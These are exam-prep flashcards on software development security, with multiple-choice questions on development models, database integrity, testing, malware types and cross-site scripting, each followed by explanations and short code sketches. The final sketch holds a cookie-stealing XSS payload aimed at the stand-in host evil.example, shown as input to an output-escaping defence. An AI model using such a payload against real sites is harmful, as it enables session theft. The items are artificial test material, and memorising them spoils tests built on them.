Software Development Security Flashcards
A new software development company has been launched to create mobile device apps for different customers. The company employs talented software programmers but has not been able to implement standardized development processes that can be improved upon over time. Which of the following would be the best approach for this company to take in order to improve its software development processes?
A. Capability Maturity Model Integration
B. System development life cycle
C. ISO/IEC 27002
D. Certification and accreditation processes
A. Capability Maturity Model Integration (CMMI) for development is a comprehensive, integrated set of guidelines for developing products and software. It addresses the different phases of a software development life cycle, including concept definition, requirements analysis, design, development, integration, installation, operations, and maintenance, and what should happen in each phase. The model describes procedures, principles, and practices that underlie software development process maturity. This model was developed to help software vendors improve their development processes by providing an evolutionary path from an ad hoc “fly by the seat of your pants” approach to a more disciplined and repeatable method that improves software quality, shortens the development life cycle, provides better project management capabilities, allows for milestones to be created and met in a timely manner, and takes a more proactive approach than the less effective reactive approach.

B is incorrect because the system development life cycle (SDLC) addresses how a system should be developed and maintained throughout its life cycle and does not entail process improvement. Each system has its own life cycle, which is made up of the following phases: initiation, acquisition/development, implementation, operation/maintenance, and disposal. A system development life cycle is different from a software development life cycle, even though they are commonly confused. The industry as a whole is starting to differentiate between system and software life-cycle processes because at a certain point of granularity, the manner in which a computer system is dealt with is different from how a piece of software is dealt with. A computer system should be installed properly, tested, patched, scanned continuously for vulnerabilities, monitored, and replaced when needed. A piece of software should be designed, coded, tested, documented, released, and maintained. In either case, the question is asking for a type of process improvement model for software development, which is the focus of Capability Maturity Model Integration and not a system development life cycle.

C is incorrect because ISO/IEC 27002 is an international standard created by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) that outlines how to create and maintain an organizational information security management system (ISMS). While ISO/IEC 27002 has a section that deals with information systems acquisition, development, and maintenance, it does not provide a process improvement model for software development. It provides guidance on how to build security into applications, but it does not provide guidance on how to create standardized development procedures for a team of programmers. The focus of ISO/IEC 27002 is how to build a security program within an organization.

D is incorrect because a certification and accreditation (C&A) process deals with testing and evaluating systems against predefined criteria. This does not have anything to do with software development process improvement. The certification process is the technical testing of a system. Established verification procedures are followed to ensure the effectiveness of the system and its security controls. Accreditation is the formal authorization given by management to allow a system to operate in a specific environment. The accreditation decision is based upon the results of the certification process. C&A procedures are commonly carried out within government and military environments to ensure that systems and software are providing the necessary functionality and security to support critical missions.
Database software should meet the requirements of what is known as the ACID test. Why should database software carry out atomic transactions, which is one requirement of the ACID test, when OLTP is used?
A. So that the rules for database integrity can be established
B. So that the database performs transactions as a single unit without interruption
C. To ensure that rollbacks cannot take place
D. To prevent concurrent processes from interacting with each other
B. Online transaction processing (OLTP) is used when databases are clustered to provide high fault tolerance and performance. It provides mechanisms to watch for and deal with problems when they occur. For example, if a process stops functioning, the monitor mechanisms within OLTP can detect this and attempt to restart the process. If the process cannot be restarted, then the transaction taking place will be rolled back to ensure that no data is corrupted and that no partial transaction is committed. OLTP records transactions as they occur (in real time), which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what’s known as the ACID test:

• Atomicity Divides transactions into units of work and ensures that either all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back.
• Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
• Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
• Durability Once the transaction is verified as accurate on all systems, it is committed, and the databases cannot be rolled back.

The term “atomic” means that the units of a transaction will occur together or not at all, thereby ensuring that if one operation fails, the others will not be carried out and corrupt the data in the database (a code sketch of this behavior follows this answer).

A is incorrect because OLTP and ACID enforce, but do not establish, the integrity rules that are outlined in the database security policy. Representing the letter C in ACID, consistency relates to the enforcement and enforceability of integrity rules. Database software that demonstrates consistency conducts transactions that follow a specific integrity policy and ensures all data is the same in the different databases.

C is incorrect because atomicity divides transactions into units of work and ensures that either all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. This means if something does not happen correctly, the database is reverted (rolled back) to its original state. After the transaction happens properly, a rollback cannot take place, which is the durability component of the ACID test. This question is specifically asking about the atomic transaction approach, not durability.

D is incorrect because atomic transactions do not address the isolation of processes that are carrying out database transactions; this is the “isolation” component of the ACID test. It is important that a process that is carrying out a transaction cannot be interrupted or modified by another process. This is to ensure the integrity, accuracy, and confidentiality of the data that is being processed during the transaction.
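The atomic commit-or-rollback behavior described above can be illustrated with a minimal sketch using Python’s built-in sqlite3 module; the accounts table and the transfer amounts are hypothetical.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER)")
    conn.execute("INSERT INTO accounts VALUES (1, 100), (2, 50)")
    conn.commit()

    try:
        # Both updates form one unit of work: either both take effect or neither does.
        conn.execute("UPDATE accounts SET balance = balance - 30 WHERE id = 1")
        conn.execute("UPDATE accounts SET balance = balance + 30 WHERE id = 2")
        conn.commit()      # all modifications take effect
    except sqlite3.Error:
        conn.rollback()    # none takes effect; the database reverts to its original state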
Lisa has learned that most databases implement concurrency controls. What is concurrency, and why must it be controlled?
A. Processes running at different levels, which can negatively affect the integrity of the database if not properly controlled
B. The ability to deduce new information from reviewing accessible data, which can allow an inference attack to take place
C. Processes running simultaneously, which can negatively affect the integrity of the database if not properly controlled
D. Storing data in more than one place within a database, which can negatively affect the integrity of the database if not properly controlled
C. Databases are commonly accessed by many different applications simultaneously and by many users interacting with them at one time. Concurrency means that different processes (applications and users) are accessing the database at the same time. If this is not controlled properly, the processes can overwrite each other’s data or cause deadlock situations. The negative result of concurrency problems is the reduction of the integrity of the data held within the database. Database integrity is provided by concurrency protection mechanisms. One concurrency control is locking, which prevents users from accessing and modifying data being used by someone else (a sketch follows this answer).

A is incorrect because concurrency refers to processes running simultaneously, not at different levels. Concurrency issues come up when the database can be accessed at the same time by different users and/or applications. If controls are not in place, two users can access and modify the same data at the same time, which can be detrimental to a dynamic environment.

B is incorrect because the ability to deduce new information from reviewing accessible data occurs when a subject at a lower security level indirectly guesses or infers data at a higher level. This can lead to an inference attack. It is not related to concurrency. Concurrency has to do with integrity, while inference is related to confidentiality.

D is incorrect because storing data in more than one place is not a problem with concurrency. Concurrency becomes a problem when two subjects or applications are trying to modify the same data at the same time.
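As an illustration of why concurrency must be controlled, the following minimal sketch uses Python’s standard threading module; the deposit function and amounts are hypothetical. Without the lock, two threads can read the same balance and each write back a stale value (a lost update).

    import threading

    balance = 0
    lock = threading.Lock()

    def deposit(amount):
        global balance
        with lock:                      # only one thread may modify the shared data at a time
            current = balance           # read
            balance = current + amount  # modify and write back

    threads = [threading.Thread(target=deposit, args=(1,)) for _ in range(1000)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(balance)  # always 1000 with the lock; without it, updates may be lost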
Robert has been asked to increase the overall efficiency of the sales database by implementing a procedure that structures data to minimize duplication and inconsistencies. What procedure is this?
A. Polymorphism
B. Normalization
C. Implementation of database views
D. Constructing schema
B. Normalization is a process that eliminates redundancy, organizes data efficiently, reduces the potential for anomalies during data operations, and improves data consistency within databases. It is a systematic way of ensuring that a database structure is designed properly to be free of certain undesirable characteristics—insertion, update, and deletion anomalies—that could lead to a loss of data integrity (a sketch follows this answer).

A is incorrect because polymorphism is when different objects are given the same input and react differently. As a simplistic example of polymorphism, suppose three different objects receive the input “Bob.” Object A would process this input and produce the output “43-year-old white male.” Object B would receive the input “Bob” and produce the output “Husband of Sally.” Object C would produce the output “Member of User group.” Each object received the same input but responded with a different output.

C is incorrect because database views are logical access controls and are implemented to permit one group, or a specific user, to see certain information while restricting another group from viewing it altogether. For example, database views can be implemented to allow middle management to see their departments’ profits and expenses without viewing the whole company’s profits. Database views do not minimize duplicate data; rather, they manipulate how data is viewed by specific users/groups.

D is incorrect because the schema of a database system is its structure described in a formal language. In a relational database, the schema defines the tables, the fields, relationships, views, indexes, procedures, queues, database links, directories, and so on. The schema describes the database and its structure, but not the data that will live within that database itself. This is similar to a blueprint of a house. The blueprint can state that there will be four rooms, six doors, 12 windows, and so on without describing the people who will live in the house.
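A minimal sketch of normalization, using Python’s built-in sqlite3 module (all table and column names are hypothetical): the denormalized layout repeats the customer’s region on every order row, while the normalized layout stores each fact once and references it by key.

    import sqlite3

    conn = sqlite3.connect(":memory:")

    # Denormalized: the customer's region is duplicated across orders, so a
    # region change must be applied to every matching row (update anomaly).
    conn.execute("""CREATE TABLE orders_denormalized (
        order_id INTEGER PRIMARY KEY,
        customer_name TEXT,
        customer_region TEXT,
        amount INTEGER)""")

    # Normalized: each fact is stored once; orders reference customers by key.
    conn.execute("""CREATE TABLE customers (
        customer_id INTEGER PRIMARY KEY,
        name TEXT,
        region TEXT)""")
    conn.execute("""CREATE TABLE orders (
        order_id INTEGER PRIMARY KEY,
        customer_id INTEGER REFERENCES customers(customer_id),
        amount INTEGER)""")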
Which of the following best describes an object-oriented database?
A. When an application queries for data, it receives both the data and the procedure.
B. It is structured similarly to a mesh network for redundancy and fast data retrieval.
C. Subjects must have knowledge of the well-defined access path in order to access data.
D. The relationships between data entities provide the framework for organizing data.
A. In an object-oriented database, objects are instantiated when needed, and the data and procedure (called a method) go with the object when it is requested (a sketch follows this answer). This differs from a relational database, in which the application uses its own procedures to obtain and process data when retrieved from the database.

B is incorrect because a mesh network is a physical topology and has nothing to do with databases. A mesh topology is a network of interconnected routers and switches that provides multiple paths to all the nodes on the network. In a full mesh topology, every node is directly connected to every other node, which provides a great degree of redundancy. In a partial mesh topology, every node is not directly connected. The Internet is an example of a partial mesh topology.

C is incorrect because subjects accessing a hierarchical database—not an object-oriented database—must have knowledge of the access path in order to access data. In the hierarchical database model, records and fields are related in a logical tree structure. Parents can have one child, many children, or no children. The tree structure contains branches, and each branch has a number of data fields. To access data, the application must know which branch to start with and which route to take through each layer until the data is reached.

D is incorrect because the relationships between data entities provide the framework for organizing data in a relational database. A relational database is composed of two-dimensional tables, and each table contains unique rows, columns, and cells. Each cell contains one data value that represents a specific attribute within a given row. These data entities are linked by relationships, which provide the framework for organizing the data.
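The trait described in answer A, the data and its procedure traveling together, can be sketched with an ordinary Python class; the class, its fields, and its method are hypothetical stand-ins for what an object-oriented database would return.

    class CustomerRecord:
        def __init__(self, name, purchases):
            self.name = name              # the data
            self.purchases = purchases

        def total_spent(self):            # the procedure (method) bundled with the data
            return sum(self.purchases)

    # A query against an object-oriented database returns such an object, so the
    # caller receives both the data and the behavior, rather than raw rows it
    # must process with its own procedures.
    record = CustomerRecord("Bob", [19, 42, 7])
    print(record.total_spent())  # 68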
Fred has been told he needs to test a component of the new content management application under development to validate its data structure, logic, and boundary conditions. What type of testing should he carry out?
A. Acceptance testing
B. Regression testing
C. Integration testing
D. Unit testing
D. Unit testing involves testing an individual component in a controlled environment to validate data structure, logic, and boundary conditions (a sketch follows this answer). After a programmer develops a component, it is tested with several different input values and in many different situations. Unit testing can start early in development and usually continues throughout the development phase. One of the benefits of unit testing is finding problems early in the development cycle, when it is easier and less expensive to make changes to individual units.

A is incorrect because acceptance testing is carried out to ensure that the code meets customer requirements. This testing is for part or all of the application, but not commonly one individual component.

B is incorrect because regression testing refers to the retesting of a system after a change has taken place to ensure its functionality, performance, and protection. Essentially, regression testing is done to identify bugs that have caused functionality to stop working as intended as a result of program changes. It is not unusual for developers to fix one problem, only to inadvertently create a new problem, or for the new fix to break a fix to an old problem. Regression testing may include checking previously fixed bugs to make sure they have not re-emerged and rerunning previous tests.

C is incorrect because integration testing involves verifying that components work together as outlined in design specifications. After unit testing, the individual components or units are combined and tested together to verify that they meet functional, performance, and reliability requirements.
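A minimal sketch of a unit test exercising logic and boundary conditions, using Python’s built-in unittest module; the clamp_percentage function under test is hypothetical.

    import unittest

    def clamp_percentage(value):
        """Clamp a number into the range 0-100."""
        return max(0, min(100, value))

    class ClampPercentageTest(unittest.TestCase):
        def test_typical_value(self):
            self.assertEqual(clamp_percentage(42), 42)

        def test_lower_boundary(self):
            self.assertEqual(clamp_percentage(0), 0)
            self.assertEqual(clamp_percentage(-1), 0)     # just below the boundary

        def test_upper_boundary(self):
            self.assertEqual(clamp_percentage(100), 100)
            self.assertEqual(clamp_percentage(101), 100)  # just above the boundary

    if __name__ == "__main__":
        unittest.main()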
Which of the following is the best description of a component-based system development method?
A. Components periodically revisit previous stages to update and verify design requirements
B. Minimizes the use of arbitrary transfer control statements between components
C. Uses independent and standardized modules that are assembled into serviceable programs
D. Implemented in module-based scenarios requiring rapid adaptations to changing client requirements
C. Component-based development involves the use of independent and standardized modules. Each standard module consists of a functional algorithm or instruction set and is provided with interfaces through which the modules communicate with one another (a sketch follows this answer). Component-based development adds reusability and pluggable functionality to programs, and it is widely used in modern programming to improve program coherence and substantially reduce software maintenance costs. A common example of these modules is the “objects” frequently used in object-oriented programming.

A is incorrect because the spiral method of system development periodically revisits previous stages to update and verify design requirements. The spiral method builds upon the waterfall method. It uses discrete phases of development with an emphasis on risk analysis, prototypes, and simulations. The spiral method does not specify the development and testing of components.

B is incorrect because structured programming development involves the use of logical blocks to achieve system design using procedural programming. A structured program layout minimizes the use of arbitrary transfer control statements like GOTO and emphasizes single points of entry and exit. This hierarchical approach makes it easier for the program to be understood and modified later on.

D is incorrect because extreme programming is a methodology that is generally implemented in scenarios requiring rapid adaptations to changing client requirements. Extreme programming emphasizes client feedback to evaluate project outcomes and to analyze project domains that may require further attention. The coding principle of extreme programming throws out the traditional long-term planning carried out for code reuse and instead focuses on creating simple code optimized for the current assignment.
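A minimal sketch of the component idea, independent modules behind a standardized interface, using Python’s typing.Protocol; the PaymentComponent interface and both implementations are hypothetical.

    from typing import Protocol

    class PaymentComponent(Protocol):
        def charge(self, amount: int) -> bool: ...

    class CardPayment:
        def charge(self, amount: int) -> bool:
            return amount > 0    # stand-in for real card processing

    class InvoicePayment:
        def charge(self, amount: int) -> bool:
            return True          # stand-in for invoicing logic

    def checkout(component: PaymentComponent, amount: int) -> bool:
        # Any component honoring the interface can be plugged in unchanged.
        return component.charge(amount)

    print(checkout(CardPayment(), 25))     # True
    print(checkout(InvoicePayment(), 25))  # True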
There are many types of viruses that hackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus?
A. Intercepts antimalware’s call to the operating system for file and system information
B. Varies the sequence of its instructions using noise, a mutation engine, or random-number generator
C. Can use different encryption schemes requiring different decryption routines
D. Produces multiple, varied copies of itself
A. A tunneling virus—not a polymorphic virus—attempts to install itself under an antimalware program. When the antimalware conducts its health check on critical files, file sizes, modification dates, etc., it makes a request to the operating system to gather this information. If the virus can put itself between the antimalware and the operating system, then when the antimalware sends out a system call for this type of information, the tunneling virus can intercept the call and respond with information that indicates the system is free of virus infections. The polymorphic virus also attempts to fool antimalware scanners, but it does so by producing varied but operational copies of itself. Even if antimalware software finds and disables one or two copies, other copies may still remain active within the system.

B is incorrect because a polymorphic virus can vary the sequence of its instructions by including noise, or bogus instructions, with other useful instructions. It can also use a mutation engine and a random-number generator to change the sequence of its instructions in the hopes of not being detected. The original functionality stays the same, but the code changes, making it close to impossible to identify all versions of the virus using a fixed signature.

C is incorrect because a polymorphic virus can use different encryption schemes requiring different decryption routines. This requires antimalware to scan for several strings, one for each possible decryption method, in order to identify all copies of this type of virus. Polymorphic virus writers most commonly hide a virus’s payload with encryption and add a decryption method to the code. Once it is encrypted, the code is meaningless. However, a virus that is encrypted is not necessarily a polymorphic virus. To be polymorphic, the virus’s encryption and decryption algorithms must mutate with each new version of itself.

D is incorrect because a polymorphic virus produces multiple varied copies of itself in an effort to avoid detection by antimalware software. A polymorphic virus has the capability to change its own code, enabling the virus to have hundreds or thousands of variants. These activities can cause the virus scanner to not properly recognize the virus and to leave it to do its damage.
Which of the following best describes the role of the Java Virtual Machine in the execution of Java applets?
A. Converts the source code into bytecode and blocks the sandbox
B. Converts the bytecode into machine-level code
C. Operates only on specific processors within specific operating systems
D. Develops the applets, which run in a user’s browser
B. Java is an object-oriented, platform-independent programming language. It is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. Java is platform independent because it creates intermediate code, bytecode, which is not processor specific. The Java Virtual Machine (JVM) then converts the bytecode into machine-level code that the processor on the particular system can understand.

A is incorrect because the Java Virtual Machine converts the bytecode into machine-level code. It does not convert the source code into bytecode—a Java compiler does that. The JVM also creates a virtual machine within an environment called a sandbox. This virtual machine is an enclosed environment in which the applet carries out its activities. Applets are commonly sent over HTTP within a requested web page, which means the applet executes as soon as it arrives. It can carry out malicious activity on purpose or accidentally if the developer of the applet did not do his part correctly. So the sandbox strictly limits the applet’s access to any system resources. The JVM mediates access to system resources to ensure the applet code behaves and stays within its own sandbox.

C is incorrect because Java is an object-oriented, platform-independent programming language. Other languages are compiled to object code for a specific operating system and processor. This is why a particular application may run on Windows but not on Mac OS. An Intel processor does not necessarily understand machine code compiled for an Alpha processor, and vice versa. Java is platform independent because it creates intermediate code—bytecode—which is not processor specific.

D is incorrect because the Java Virtual Machine does not write applets. Java is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. A programmer creates a Java applet and runs it through a compiler. The Java compiler converts the source code into bytecode. The user then downloads the Java applet. The bytecode is converted into machine-level code by the JVM. Finally, the applet runs when called upon.
What type of database software integrity service guarantees that tuples are uniquely identified by primary key values?
A. Concurrent integrity
B. Referential integrity
C. Entity integrity
D. Semantic integrity
C. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A tuple is a row in a two-dimensional database. A primary key is a value in the corresponding column that makes each row unique. For the sake of entity integrity, every tuple must contain one primary key. If a tuple does not have a primary key, it cannot be referenced by the database (a sketch showing both entity and referential integrity follows this answer).

A is incorrect because concurrent integrity is not a formal database software term. This is a distracter answer. There are three main types of integrity services: semantic, referential, and entity. Concurrency refers to a piece of software being accessed by multiple users and/or applications at the same time. If controls are not in place, two users can access and modify the same data simultaneously.

B is incorrect because referential integrity refers to all foreign keys referencing existing primary keys. There should be a mechanism in place that ensures that no foreign key contains a reference to a primary key of a nonexistent record or a null value. This type of integrity control ensures that the relationships between the different tables are working and that the tables can properly communicate with each other.

D is incorrect because a semantic integrity mechanism ensures that the structural and semantic rules of a database are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database.
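A minimal sketch of both integrity services, using Python’s built-in sqlite3 module; the departments and employees tables are hypothetical. Note that SQLite enforces foreign keys only after the foreign_keys pragma is enabled.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")
    conn.execute("CREATE TABLE departments (dept_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("""CREATE TABLE employees (
        emp_id INTEGER PRIMARY KEY,     -- entity integrity: each row uniquely identified
        dept_id INTEGER NOT NULL REFERENCES departments(dept_id))""")

    conn.execute("INSERT INTO departments VALUES (10, 'Sales')")
    conn.execute("INSERT INTO employees VALUES (1, 10)")  # references an existing key: OK

    try:
        conn.execute("INSERT INTO employees VALUES (2, 99)")  # no department 99 exists
    except sqlite3.IntegrityError as e:
        print("referential integrity violation:", e)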
In computer programming, cohesion and coupling are used to describe modules of code. Which of the following is a favorable combination of cohesion and coupling?
A. Low cohesion, low coupling
B. High cohesion, high coupling
C. Low cohesion, high coupling
D. High cohesion, low coupling
D. When a module is described as having high cohesion and low coupling, that is a good thing (a sketch follows this answer). Cohesion reflects how many different types of tasks a module can carry out. High cohesion means that the module carries out one basic task (such as subtraction of values) or several tasks that are very similar (such as subtraction, addition, multiplication). The higher the cohesion, the easier it is to update or modify the module without affecting the other modules that interact with it. This also means the module is easier to reuse and maintain because it is more straightforward when compared to a module with low cohesion. Coupling is a measurement that indicates how much interaction one module requires to carry out its tasks. If a module has low or loose coupling, this means the module does not need to communicate with many other modules to carry out its job. Such modules are easier to understand and easier to reuse than those that depend upon many other modules to carry out their tasks. It is also easier to make changes to these modules without affecting many modules around them.

A is incorrect because a module with low cohesion is not desirable. A module with low cohesion carries out multiple different tasks, which increases the complexity of the module and makes it harder to maintain and reuse. The higher a module’s cohesion, the fewer tasks it carries out and the easier it is to update or modify that module without affecting others that interact with it.

B is incorrect because a module with high coupling is not desirable. High coupling means a module depends upon many other modules to carry out its tasks. This makes it difficult to understand, reuse, and make changes because of the interdependencies with other modules. As an analogy, a company would want its employees to be able to carry out their individual jobs with the least amount of dependency on other workers. If Joe had to talk with five other people just to get one task done, too much complexity exists, it’s too time consuming, and more places are created where errors can take place.

C is incorrect because it states the exact opposite of what is desirable. A module that has low cohesion and high coupling is complex in that it carries out multiple different types of tasks and depends upon many other modules to carry them out. These characteristics make the module harder to maintain and reuse, largely because of the greater possibility of affecting other modules that interact with it.
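A minimal sketch of the favorable combination, a small Python module with high cohesion (it performs only closely related arithmetic tasks) and low coupling (it depends on no other modules); all names are hypothetical.

    # High cohesion: the module does one basic kind of task and nothing else,
    # so it is easy to understand, reuse, and modify in isolation.
    def add(a, b):
        return a + b

    def subtract(a, b):
        return a - b

    # Low coupling: a caller depends only on this small, self-contained module.
    # A low-cohesion, high-coupling alternative would mix arithmetic with, say,
    # logging, persistence, and e-mail, and would need many other modules to work.
    total = add(10, subtract(7, 2))
    print(total)  # 15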
Which of the following statements does not correctly describe SOAP and Remote Procedure Calls?
A. SOAP was designed to overcome the compatibility and security issues associated with Remote Procedure Calls.
B. Both SOAP and Remote Procedure Calls were created to enable application-layer communication.
C. SOAP enables the use of Remote Procedure Calls for information exchange between applications over the Internet.
D. HTTP was not designed to work with Remote Procedure Calls, but SOAP was designed to work with HTTP.
C. The Simple Object Access Protocol (SOAP) was created to be used in place of Remote Procedure Calls (RPCs), allowing applications to exchange information over the Internet. SOAP is an XML-based protocol that encodes messages in a web service setup (a sketch follows this answer). It allows programs running on different operating systems to communicate over web-based communication methods.

A is incorrect because SOAP was created to overcome the compatibility and security issues that RPCs introduced when trying to enable communication between objects of different applications over the Internet. SOAP is designed to work across multiple operating system platforms, browsers, and servers.

B is incorrect because it is true that both SOAP and RPCs were created to enable application-layer communication. SOAP is an XML-based protocol that encodes messages in a web service setup. So if you have a Windows client and you need to access a Windows server that offers a specific web service, the programs on both systems can communicate using SOAP without running into interoperability issues. This communication most commonly takes place over HTTP, since it is readily available on basically all computers today.

D is incorrect because the statement is correct: HTTP was not designed to work specifically with RPCs, but SOAP was designed to work with HTTP. SOAP actually defines an XML schema, or a structure, for how communication is going to take place. The SOAP XML schema defines how objects communicate directly. One advantage of SOAP is that the program calls will most likely get through firewalls, since HTTP communication is commonly allowed. This helps ensure that the client/server model is not broken by being denied by a firewall between the communicating entities.
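A minimal sketch of a SOAP call over HTTP using only Python’s standard library; the endpoint URL, XML namespace, and GetPrice operation are hypothetical, and the final request is left commented out.

    import urllib.request

    envelope = """<?xml version="1.0"?>
    <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
      <soap:Body>
        <GetPrice xmlns="http://example.com/stock">
          <Symbol>ACME</Symbol>
        </GetPrice>
      </soap:Body>
    </soap:Envelope>"""

    request = urllib.request.Request(
        "http://example.com/stock-service",   # hypothetical endpoint
        data=envelope.encode("utf-8"),
        headers={"Content-Type": "application/soap+xml; charset=utf-8"},
    )
    # Because the XML message rides over ordinary HTTP, it typically passes
    # through firewalls that already allow web traffic.
    # response = urllib.request.urlopen(request)   # would perform the call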
Which of the following is a correct description of the pros and cons associated with third-generation programming languages?
A. The use of heuristics reduced programming effort, but the amount of manual coding for a specific task is usually more than the preceding generation.
B. The use of syntax similar to human language reduced development time, but the language is resource intensive.
C. The use of binary was extremely time consuming but resulted in fewer errors.
D. The use of symbols reduced programming time, but the language required knowledge of machine architecture.
B. Third-generation programming languages are easier to work with than earlier languages because their syntax is similar to human languages. This reduces program development time and allows for simplified and swift debugging. However, these languages can be very resource intensive when compared to second-generation programming languages.

A is incorrect because it attempts to describe the pros and cons of fourth-generation programming languages. It is true that the use of heuristics in fourth-generation programming languages drastically reduced the programming effort and the possibility of errors in code. However, it is not true that the amount of manual coding was usually more than that required by third-generation languages. On the contrary, the most remarkable aspect of fourth-generation languages is that the amount of manual coding required to perform a specific task may be ten times less than for the same task in a third-generation language.

C is incorrect because the statement alludes to the pros and cons of machine language, the first generation of programming languages. The first portion of the statement is true: programming in binary was time consuming. The second half, however, is incorrect. Programming in binary was very prone to errors.

D is incorrect because it describes second-generation programming languages. By introducing symbols to represent complicated binary codes, second-generation programming languages reduced programming and debugging times. Unfortunately, these languages required extensive knowledge of machine architecture, and the programs written in them were hardware specific.
It can be very challenging for programmers to know what types of security should be built into the software that they create. The number of vulnerabilities, threats, and risks involved with software development can seem endless. Which of the following describes the best first step for developers to take to identify the security controls that should be coded into a software project?
A. Penetration testing
B. Regression testing
C. Threat modeling
D. Attack surface analysis
C. Threat modeling is a systematic approach used to understand how different threats could be realized and how a successful compromise could take place. A threat model is created to define a set of possible attacks that can take place so the necessary countermeasures can be identified and implemented. Through the use of a threat model, the software team can identify and rate threats. Rating the threats based upon the probability of exploitation and the associated impact of each exploitation allows the team to focus on the threats that present the greatest risk (a sketch of this rating step follows this answer). When using threat modeling in software development, the process starts at the design phase and should continue in an iterative process through each phase of the software’s life cycle. Different software development threat modeling approaches exist, but they have many of the same steps, including identifying assets, trust boundaries, data flows, entry points, privileged code, etc. This approach also includes building attack trees, which represent the goals of each attack and the attack methodologies. The output of all of these steps is then reviewed, and security controls are selected and coded into the software.

A is incorrect because penetration testing is basically attacking a system to identify any weaknesses or vulnerabilities. A penetration test can be carried out on the software only after it has been at least partially developed; it is not a tool that can be used at the coding stage. A penetration test is different from building a threat model. A threat model is developed so that vulnerabilities and their associated threats can be identified and removed or mitigated. A threat model outlines all of the possible attack vectors that could be exploited. A penetration test is the act of exploiting vulnerabilities in the real world to fully understand what an attacker can accomplish when exploiting specific vulnerabilities.

B is incorrect because regression testing is a type of test that is carried out to identify software bugs that exist after changes have taken place. The goal of regression testing is to ensure that changes do not introduce new faults. Testers need to figure out if a change to one part of a software program will affect other parts of the software. A software regression is a bug (flaw) that makes a feature stop working after a change (e.g., patch applied, software upgrade) takes place. A software performance regression is a fault that does not cause the feature to stop working, but the performance of the function is degraded. Regression testing is not security focused and is not used with the goal of identifying vulnerabilities.

D is incorrect because an attack surface analysis is used to map out the parts of a software program that need to be reviewed and tested for vulnerabilities. An attack surface consists of the components that are available to be used by an attacker against the software itself. The attack surface is the sum of the different attack vectors that can be used by an unauthorized user to compromise the system. The more attack surface that is available to attackers, the more they have to work with and use against the software itself. Securing software commonly includes reducing the attack surface and applying defense-in-depth to the portions of the software that cannot have their surface reduced. There is a recursive relationship between an attack surface analysis and threat modeling. When there are changes to an attack surface, threat modeling should take place to identify the new threats that will need to be dealt with. So an attack surface analysis charts out what areas need to be analyzed, and threat modeling allows the developers to walk through attack scenarios to determine the reality of each identified threat.
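A minimal sketch of the threat-rating step referenced in the explanation of answer C, ranking threats by probability of exploitation multiplied by impact so the team can focus on the greatest risk first; the threats and scores are hypothetical and illustrative only.

    threats = [
        {"name": "SQL injection via login form", "probability": 0.8, "impact": 9},
        {"name": "Predictable session tokens",   "probability": 0.4, "impact": 7},
        {"name": "Verbose error messages",       "probability": 0.9, "impact": 3},
    ]

    # Sort by risk score (probability x impact), highest first.
    for threat in sorted(threats, key=lambda t: t["probability"] * t["impact"],
                         reverse=True):
        score = threat["probability"] * threat["impact"]
        print(f'{score:4.1f}  {threat["name"]}')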
Mary is creating malicious code that will steal a user’s cookies by modifying the original client-side JavaScript. What type of cross-site scripting vulnerability is she exploiting?
A. Second order
B. DOM-based
C. Persistent
D. Nonpersistent
B. Mary is exploiting a document object model (DOM)–based cross-site scripting (XSS) vulnerability, which is also referred to as local cross-site scripting. The DOM is the standard structural layout used to represent HTML and XML documents in the browser. In such attacks, document components such as form fields and cookies can be referenced through JavaScript. The attacker uses the DOM environment to modify the original client-side JavaScript. This causes the victim’s browser to execute the resulting abusive JavaScript code. The most effective way to prevent these attacks is to disable scripting support in the browser.

A is incorrect because a second-order vulnerability, or persistent XSS vulnerability, targets websites that allow users to input data that is stored in a database or other location, such as a forum or message board. Second-order vulnerabilities enable the most dominant type of XSS attack.

C is incorrect because a persistent XSS vulnerability is simply another name for a second-order vulnerability. As previously stated, these vulnerabilities appear on sites that allow users to input data that is stored in a database or other location, such as an online forum or message board. These types of platforms are among the most commonly plagued by XSS vulnerabilities. The best way to overcome these vulnerabilities is through secure programming practices. Each and every user input should be filtered, and only a limited set of known and secure characters should be allowed for user input (a sketch of a related encoding defense follows this answer).

D is incorrect because nonpersistent XSS vulnerabilities, also referred to as reflected vulnerabilities, occur when an attacker tricks the victim into opening a URL programmed with a rogue script to steal the victim’s sensitive information (such as a cookie). The principle behind this attack lies in exploiting the lack of proper input or output validation on dynamic websites.
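A minimal sketch of one common defense complementary to the input filtering described above, output encoding, using Python’s standard html module; the user_input value is hypothetical.

    import html

    user_input = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

    # Escaping turns markup characters into harmless entities before the value
    # is written into a page, so the browser renders it as text instead of
    # executing it as script.
    safe_output = html.escape(user_input)
    print(safe_output)
    # &lt;script&gt;document.location=&quot;http://evil.example/?c=&quot;+document.cookie&lt;/script&gt;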